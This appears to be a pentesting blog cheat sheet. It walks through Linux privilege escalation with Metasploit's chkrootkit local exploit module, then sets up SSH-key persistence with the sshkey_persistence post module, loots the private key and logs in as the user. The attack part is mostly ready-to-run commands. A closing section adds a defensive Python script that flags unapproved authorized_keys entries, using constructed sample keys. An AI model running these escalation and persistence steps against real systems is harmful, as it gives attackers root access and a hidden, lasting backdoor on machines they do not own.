root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!


Exploiting chkrootkit

To check the running processes

ps aux

To escalate privileges using chkrootkit, first upgrade the shell to a Meterpreter session

sessions -u 1

Now look for the module

search chkrootkit
use exploit/unix/local/chkrootkit

Exploiting (SESSION is the Meterpreter session; check the path to chkrootkit on the target's machine)

set SESSION 2
set chkrootkit /bin/chkrootkit
set LHOST
set LPORT
run

Linux Persistence

After getting root on the target's machine, set up persistence (SESSION is the root Meterpreter session)

use post/linux/manage/sshkey_persistence
set SESSION 4
set CREATESSHFOLDER true
exploit

To view the newly created private key, which can be used to authenticate to the target system

loot

Restrict the permissions on the private key (ssh refuses a private key that other users can read)

chmod 0400 id_rsa

To authenticate as the user

ssh user@10.10.10.10 -i id_rsa

Another way to do this is to copy the id_rsa key after getting a root shell, instead of using the Metasploit module.
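
On the defender's side, this kind of persistence shows up as an extra entry in a user's authorized_keys file. The following is an added example (not from the original page or from Metasploit) that flags keys whose fingerprint is not on an approved list; the key blobs, comments and approved set are constructed sample values.

```python
import base64
import hashlib

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")

def fingerprint(blob_b64):
    """SHA256 fingerprint of a base64 key blob, in the form ssh-keygen -l prints."""
    digest = hashlib.sha256(base64.b64decode(blob_b64, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_keys(text):
    """Yield (line_no, key_type, fingerprint, comment) per authorized_keys entry."""
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        # Options such as from="..." or command="..." may precede the key type,
        # so scan for a key-type token followed by a blob that decodes (heuristic).
        for i, tok in enumerate(fields[:-1]):
            if not tok.startswith(KEY_TYPES):
                continue
            try:
                fp = fingerprint(fields[i + 1])
            except ValueError:  # not valid base64: keep scanning
                continue
            yield n, tok, fp, " ".join(fields[i + 2:])
            break
        else:
            yield n, None, None, "unparseable line"

def unexpected_keys(text, approved):
    """Return every entry whose fingerprint is not in the approved set."""
    return [entry for entry in parse_keys(text) if entry[2] not in approved]

# Constructed sample data: these blobs are placeholders, not real SSH keys.
ADMIN = base64.b64encode(b"constructed admin key blob").decode()
ROGUE = base64.b64encode(b"constructed unknown key blob").decode()
SAMPLE = f"""# constructed authorized_keys content
from="10.0.0.5",no-pty ssh-ed25519 {ADMIN} admin@laptop
ssh-rsa {ROGUE}
"""

if __name__ == "__main__":
    for line_no, ktype, fp, comment in unexpected_keys(SAMPLE, {fingerprint(ADMIN)}):
        print(f"line {line_no}: unapproved {ktype} key {fp} {comment}")
```

Run it over every authorized_keys file on the host (root's included) and treat unparseable lines as findings too.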